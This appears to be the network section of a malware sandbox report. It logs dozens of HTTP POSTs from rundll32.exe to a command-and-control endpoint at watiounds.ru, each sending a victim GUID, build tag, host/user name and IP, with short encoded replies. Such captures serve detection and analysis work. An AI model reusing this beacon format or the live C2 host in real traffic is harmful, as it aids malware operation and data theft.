                                          Apr 29, 2021 08:23:41.758727074 CEST | 373 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:41.887953997 CEST | 373 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:41 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Ascii: cKKPPARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          303 | 192.168.2.22 | 49468 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:42.212184906 CEST | 374 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:42.339983940 CEST | 374 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:42 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Ascii: cGNMTARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          304 | 192.168.2.22 | 49469 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:42.660339117 CEST | 375 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:42.784445047 CEST | 376 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:42 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Ascii: cAFUZARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          305 | 192.168.2.22 | 49470 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:43.114468098 CEST | 376 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:43.242408037 CEST | 377 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:43 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Ascii: cZVEAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          306 | 192.168.2.22 | 49471 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:43.557630062 CEST | 377 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:43.683438063 CEST | 378 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:43 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Ascii: cZKPAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          307 | 192.168.2.22 | 49472 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:43.996218920 CEST | 379 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:44.119332075 CEST | 379 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:44 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Ascii: cHHSSARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          308 | 192.168.2.22 | 49473 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:44.435489893 CEST | 380 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:44.561414003 CEST | 380 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:44 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Ascii: cQYBJARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          309 | 192.168.2.22 | 49474 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:44.893280029 CEST | 381 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:45.017296076 CEST | 381 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:44 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Ascii: cGQJTARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          31 | 192.168.2.22 | 49196 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:37.357884884 CEST | 70 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:37.486300945 CEST | 70 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:37 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Ascii: cYBYBARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          310 | 192.168.2.22 | 49475 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:45.340107918 CEST | 382 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:45.462308884 CEST | 382 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:45 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 4d 4e 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMMNNARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          311 | 192.168.2.22 | 49476 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:45.783958912 CEST | 383 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:45.918180943 CEST | 383 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:45 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 4a 51 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYJQBARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          312 | 192.168.2.22 | 49477 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:46.243427992 CEST | 384 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:46.369015932 CEST | 385 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:46 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 42 4a 51 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cBJQYARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          313 | 192.168.2.22 | 49478 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:46.685139894 CEST | 385 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:46.813312054 CEST | 386 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:46 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 46 55 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCFUXARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          314 | 192.168.2.22 | 49479 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:47.131195068 CEST | 386 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:47.257323980 CEST | 387 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:47 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 48 53 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYHSBARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          315 | 192.168.2.22 | 49480 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:47.567349911 CEST | 388 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:47.695215940 CEST | 388 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:47 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 47 59 42 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cGYBTARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          316 | 192.168.2.22 | 49481 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:48.006076097 CEST | 389 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:48.135432005 CEST | 389 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:48 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 47 42 59 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cGBYTARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          317 | 192.168.2.22 | 49482 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:48.456270933 CEST | 390 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:48.581422091 CEST | 390 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:48 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 51 59 42 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cQYBJARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          318 | 192.168.2.22 | 49483 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:48.903702974 CEST | 391 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:49.032598972 CEST | 391 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:49 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 43 58 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNCXMARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          319 | 192.168.2.22 | 49484 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:49.369448900 CEST | 392 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:49.492302895 CEST | 392 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:49 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 4e 4d 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYNMBARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          32 | 192.168.2.22 | 49197 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:21:37.810127974 CEST | 71 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:37.941628933 CEST | 71 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:37 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 47 51 4a 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cGQJTARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          320 | 192.168.2.22 | 49485 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:49.814110041 CEST | 393 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:49.942615986 CEST | 393 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:49 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 54 4b 50 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cTKPGARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          321 | 192.168.2.22 | 49486 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:50.260924101 CEST | 394 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:50.383059978 CEST | 395 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:50 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 47 48 53 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cGHSTARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          322 | 192.168.2.22 | 49487 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:50.706049919 CEST | 395 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:50.828676939 CEST | 396 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:50 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 56 59 42 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cVYBEARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          323 | 192.168.2.22 | 49488 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:51.151055098 CEST | 397 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:51.280703068 CEST | 397 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:51 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 41 5a 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZAZAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          324 | 192.168.2.22 | 49489 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:23:51.602871895 CEST | 398 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
